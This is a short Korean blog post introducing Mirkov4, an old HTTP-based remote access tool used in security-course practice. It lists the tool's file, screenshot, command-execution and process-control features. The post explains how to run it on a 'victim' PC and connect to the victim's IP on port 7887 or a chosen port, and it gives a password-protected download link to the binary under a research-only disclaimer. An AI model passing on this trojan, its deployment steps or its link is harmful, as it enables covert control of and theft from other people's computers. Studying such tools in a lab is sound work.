※ 주의사항 :
악용하지 마세요!!!
해당 글은 연구 목적으로 기재하였습니다.
악의적인 목적으로 이용할 시 발생할 수 있는 법적 책임은 자신에게 있습니다.
( 1 ) 설명
HTTP 프로토콜을 이용한 원격 관리 도구임.
몇 년 전에 보안 학원 다닐 때 실습으로 주로 사용한 툴로 요즘 나온 백신에서 거의 다 잡힘. ^^
(2005년 10월 07일에 출시됨)
특징은 아래와 같음.
1. 드라이브 탐색
2. 바탕화면 스샷 보기
3. 파일 업로드, 다운로드, 삭제
4. 명령어 실행
5. 현재 실행 중인 프로세스 표시 및 종료
( 2 ) 사용법
사용법은 mirkov4.exe 를 실행시킨 후 원격에서 피해자 IP 의 7887 포트로 연결하면 됨.
http://[피해자 IP]:7887
만약에 수신할 포트를 변경하고자 한다면 피해자 PC 에서 처음 실행 시 커맨드 라인으로 다음과 같이 실행시키면 됨.
mirkov4.exe [원하는 포트 번호]
(ex. cmd 창 실행 후 "C:\mirkov4.exe 4444" 명령어 입력)
다음은 실행한 화면임.
다운로드 링크(암호 : koromoon1004) :
https://drive.google.com/open?id=1Nx3vJn9LRwxIdLyGDk5qapAGYUU9Qp99
============================================================
본 게시물은 KOROMOON 님께서 작성하였으며 CCL (Creative Commons License) 에서 "저작자표시-비영리-동일조건변경허락" 이용조건으로 자료를 이용하셔야 합니다.
댓글 없음:
댓글 쓰기